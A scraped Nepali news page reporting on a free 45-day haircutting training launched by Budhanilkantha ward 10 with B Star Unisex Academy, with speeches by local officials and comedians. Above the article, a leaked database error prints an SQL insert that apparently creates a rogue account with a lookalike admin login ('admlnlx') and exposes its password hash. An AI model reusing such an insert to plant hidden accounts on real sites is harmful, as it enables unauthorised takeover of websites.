WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BAnC8GBH9EWLZZt//ur/5ceCnBnzJ9.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 04:23:17', '', 'admlnlx', 'admlnlx')

बि. स्टारद्वारा ४५ दिने निशुल्क कपाल काट्ने तालिम शुरु – Gaule Khabar

बि. स्टारद्वारा ४५ दिने निशुल्क कपाल काट्ने तालिम शुरु

बि. स्टारद्वारा ४५ दिने निशुल्क कपाल काट्ने तालिम शुरु

काठमाण्डौ । बुढानिलकण्ठ नगरपालिका वडा नं १० ले ४५ दिने निशुल्क कपाल काट्ने तालिमा सुरु गरेको छ ।

बुढानिलकण्ठ वडा न १० को आर्थिक लगानी र बि स्टार युनिसेक एकेडेमीको ब्यबस्थापनामा तालिमा शुरु भएको हो ।

आज (आइतबार) काठमाडौको कपनमा बुढानिलकण्ठ १० का वडा अध्यक्ष नवराज भटराई, वडा १२ का अध्यक्ष शम्भु भट्टराई हास्य टेलिसिरियल सक्किगोनिका कलाकार हरि निरौला (कक्रोज), सुबोध गौतम (एदुमे), ले डमीमा कपाल काटेर तालिमको शुभारम्भ गरेका हुन ।

उदघाटन समारोहलाई सम्बोधन गर्दै बुढानिलकण्ठ नगरपालिका वडा नं १० का वडाध्यक्ष नवराज भट्टराईले स्वदेशी परिश्रम स्वदेशमा आम्दानी हुने भएकाले आफनो वडाभित्र विभिन्न शिपमुलक प्रशिक्षण दिन लागेको बताए । भट्टराईले कपाल काटने काममा मात्र मासिक करोडौ रमक बाहिरिने गरेको उल्लेख नेपालीले नै कपाल काटने व्यवसाय चलाए नेपालीले नै रोजगार पाउने नेपालीकै जीवनस्तर उकास्ने तथा नेपाली पैसा विहार नपुग्ने बताए ।

कार्यक्रममा वडा न १२ का वडाध्यक्ष शम्भु भट्टराईले आफ्नो वडामा पनि यस्तै शिपमुलक कार्यक्रम ल्याउन आफु तयार रहेको उल्लेख गरे । साथै तालिम लिन ईच्छा व्यक्त गर्ने सम्पुर्ण विद्यार्थीहरुलाई सहि ढंगले तालिमको सदुपयोग गर्न आह्वान गर्दै ४५ दिने तालिम सकेपछि रोजगारीको लागि वडाले सक्ने साथ, सहयोग र सद्भाव प्रकट गर्ने आश्वासन दिए ।

कार्यक्रममा कलाकार हरि निरौला (कक्रोज) तालिमले प्रभावकारी भुमीका खेल्ने उल्लेख गर्दै तालिम पश्चात स्वदेशमा नै रोजगार सिर्जना गर्न सहज हुने बताए । साथै उनले कुनैपनि सीप ठूलो सानो नहुने र सिपले नै मानिसलाई सक्षम बनाउने भएकाले आफुले जानेबुझेको सिपलाई सहि तरिकाले प्रस्तुत गर्न तालिममा उपस्थित विद्यार्थीहरुलाई अनुरोध गर्दै यस्ता तालिमले परदेश भासिनेको संख्या पनि घटाउन मद्दत मिल्ने बताए । यसैगरी कलाकार सुबोध गौतम (एदुमे) ले आफ्नो क्षमता आफ्नै देशमा प्रस्तुत गर्न नसक्दा बाहिरी मुलुकका मानिसले नेपालमा आएर विभिन्न काम गरिरहनु परेको र नेपालमा नै यस्ता तालिमहरु अझै धेरै हुन सकेमा स्वदेशमा नै पैसा भित्रन सक्ने साथै रोजगारीको लागि भौतारिन पर्ने बाध्यताको अन्त्य हुनसक्ने बताए ।

कार्यक्रम स्थानिया बुद्विजिवी, प्रशिक्षार्थी, संचारकर्मिको बाक्लो उपस्तिथी रहेको थियो ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका